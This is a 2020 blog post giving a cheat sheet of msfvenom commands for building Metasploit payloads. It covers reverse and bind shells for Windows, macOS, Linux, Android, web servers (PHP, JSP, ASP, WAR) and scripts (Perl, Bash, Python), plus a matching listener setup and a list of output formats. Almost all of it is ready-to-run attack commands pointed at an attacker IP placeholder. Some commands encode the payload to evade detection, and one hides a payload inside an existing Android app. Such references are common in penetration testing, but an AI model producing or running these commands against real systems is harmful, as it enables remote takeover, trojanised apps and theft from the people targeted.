GEEKPRATIK
28 Apr 2020

MsfVenom Payload Cheat Sheet | Meterpreter Payload Cheat Sheet

MSFvenom Payload Creator (MSFPC) is a user-friendly multiple payload generator that can be used to generate Metasploit payloads based on user-selected options.

Placeholders to Replace
ip-address => Attacker IP address
port => Attacker port

Metasploit Payload Listener

  • msfdb run
  • use exploit/multi/handler
  • set payload payload-name
  • set lhost ip-address
  • set lport port
  • run

Windows Payloads

Windows Meterpreter Reverse Shell

msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe

Windows Reverse Shell

msfvenom -p windows/shell/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe

Windows Encoded Meterpreter Reverse Shell

msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -e x86/shikata_ga_nai -i 2 -f exe > payload-name.exe

Windows Meterpreter Reverse Shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f <platform>

macOS Payloads

macOS Bind Shell

msfvenom -p osx/x86/shell_bind_tcp rhost=ip-address lport=port -f macho > payload-name.macho

macOS Reverse Shell

msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f macho > payload-name.macho

macOS Reverse TCP Shellcode

msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f <platform>

Linux Payloads

Linux Meterpreter TCP Reverse Shell

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f elf > payload-name.elf

Linux Bind TCP Shell

msfvenom -p generic/shell_bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf

Linux Bind Meterpreter TCP Shell

msfvenom -p linux/x86/meterpreter/bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf

Linux Meterpreter Reverse Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f <platform>

Web-Based Payloads

PHP Meterpreter Reverse Shell

msfvenom -p php/meterpreter_reverse_tcp lhost=ip-address lport=port -f raw > payload-name.php

JSP Java Meterpreter Reverse Shell

msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f raw > payload-name.jsp

ASP Meterpreter Reverse Shell

msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f asp > payload-name.asp

WAR Reverse TCP Shell

msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f war > payload-name.war

Script-Based Payloads

Perl Unix Reverse Shell

msfvenom -p cmd/unix/reverse_perl lhost=ip-address lport=port -f raw > payload-name.pl

Bash Unix Reverse Shell

msfvenom -p cmd/unix/reverse_bash lhost=ip-address lport=port -f raw > payload-name.sh

Python Reverse Shell

msfvenom -p cmd/unix/reverse_python lhost=ip-address lport=port -f raw > payload-name.py

Android Payloads

Android Meterpreter Reverse Payload

msfvenom -p android/meterpreter/reverse_tcp lhost=ip-address lport=port R > payload-name.apk

Android Embed Meterpreter Payload

msfvenom -x <app.apk> -p android/meterpreter/reverse_tcp lhost=ip-address lport=port -o payload-name.apk

MsfVenom Payload Formats

    Name
    ----
    asp
    aspx
    aspx-exe
    axis2
    dll
    elf
    elf-so
    exe
    exe-only
    exe-service
    exe-small
    hta-psh
    jar
    jsp
    loop-vbs
    macho
    msi
    msi-nouac
    osx-app
    psh
    psh-cmd
    psh-net
    psh-reflection
    vba
    vba-exe
    vba-psh
    vbs
    war

Framework Transform Formats [--format <value>]
==============================================

    Name
    ----
    bash
    c
    csharp
    dw
    dword
    hex
    java
    js_be
    js_le
    num
    perl
    pl
    powershell
    ps1
    py
    python
    raw
    rb
    ruby
    sh
    vbapplication
    vbscript